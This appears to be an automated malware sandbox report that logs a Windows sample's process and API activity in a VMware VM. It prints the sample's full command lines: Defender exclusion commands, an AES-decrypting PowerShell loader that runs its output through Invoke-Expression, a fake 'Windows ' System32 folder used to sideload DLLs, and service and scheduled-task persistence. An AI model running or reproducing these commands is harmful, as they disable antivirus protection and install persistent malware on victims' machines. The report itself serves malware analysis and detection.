Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FF9C550631D sldt word ptr [eax] 34_2_00007FF9C550631D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3509
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1900
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6961
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows\System32\xcopy.exe Dropped PE file which has not been started: C:\Windows \System32\x249569.dat
Source: C:\Program Files\7-Zip\7zFM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows\System32\svchost.exe API coverage: 0.5 %
Source: C:\Windows\System32\OpenWith.exe TID: 6948 Thread sleep count: 34 > 30
Source: C:\Windows\System32\svchost.exe TID: 6312 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep count: 1432 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep count: 8470 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212 Thread sleep count: 1474 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228 Thread sleep count: 8347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 3408 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 1544 Thread sleep count: 85 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 Thread sleep count: 3509 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252 Thread sleep count: 6206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep count: 1900 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep count: 7912 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 2828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 6961 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h 46_2_64946F50
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 46_2_00007FFA4185014C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError, 46_2_00007FFA41850008
Source: C:\Windows\System32\console_zero.exe Thread delayed: delay time: 30000
Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2321378970.00000150FB22F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.2309415733.000001F54E80B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 0000000B.00000002.2322397815.000001F54E902000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002E.00000002.2347960506.00000224C243C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000000B.00000002.2319192112.000001F54E867000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\svchost.exe Code function: 46_2_649461C0 IsDebuggerPresent,RaiseException, 46_2_649461C0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, 51_2_00007FFA3312B470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_64947650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 46_2_6828C940
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA2CEAEE70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA2CEAFA50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF16630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA2CF16630
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF16F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA2CF16F94
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CF17178 SetUnhandledExceptionFilter, 46_2_00007FFA2CF17178
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41852770 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_00007FFA41852770
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41866A2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00007FFA41866A2C
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33146224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_00007FFA33146224
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331457A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 51_2_00007FFA331457A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_00007FFA5112E24C
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA5112D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 51_2_00007FFA5112D768

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_3740.amsi.csv, type: OTHER
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer "..\USB Drive"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x338625\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x338625.dat" /f && sc start x338625
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [system.security.cryptography.aes]::create(); $aee.key = $ky; $aee.iv = $vv; $decr = $aee.createdecryptor($aee.key, $aee.iv); $ciptbyt = [system.convert]::frombase64string($cptx); $decrbyt = $decr.transformfinalblock($ciptbyt, 0, $ciptbyt.length); return [system.text.encoding]::utf8.getstring($decrbyt); } $b64 = 'bewpxcexni2h+9tnoro88vzr8lsvfbhxwo43zjwb2uee39wbwt2wfyjn+m6ajl2oz3gigcocur6wcc/5iylv6c3hjnhgfxv59acfokqxmkxu/mfojbe45vyaxpin5erm20zro4flljjjuxjlix/f0tok8te1cgaqlpe0b+bo2x4qgs6hralwujuorg9gjhgh'; $ky = [byte[]](0x1e, 0x5b, 0x26, 0xf0, 0x75, 0x52, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe4, 0x98, 0xe4); $vv = [byte[]](0x10, 0x5b, 0x26, 0xe1, 0x75, 0x51, 0xe6, 0xf4, 0x7d, 0xbb, 0x3a, 0x6d, 0xb0, 0xe1, 0x88, 0xff); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; invoke-expression $pcmd;"
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA, 46_2_68295290
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoA, 46_2_682A1460
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp, 46_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort, 46_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA, 46_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn, 46_2_00007FFA2CF14B70
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA418731AC
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 46_2_00007FFA41873674
Source: C:\Windows\System32\svchost.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 46_2_00007FFA418814CC
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesW, 46_2_00007FFA41881830
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,FormatMessageA, 46_2_00007FFA41850830
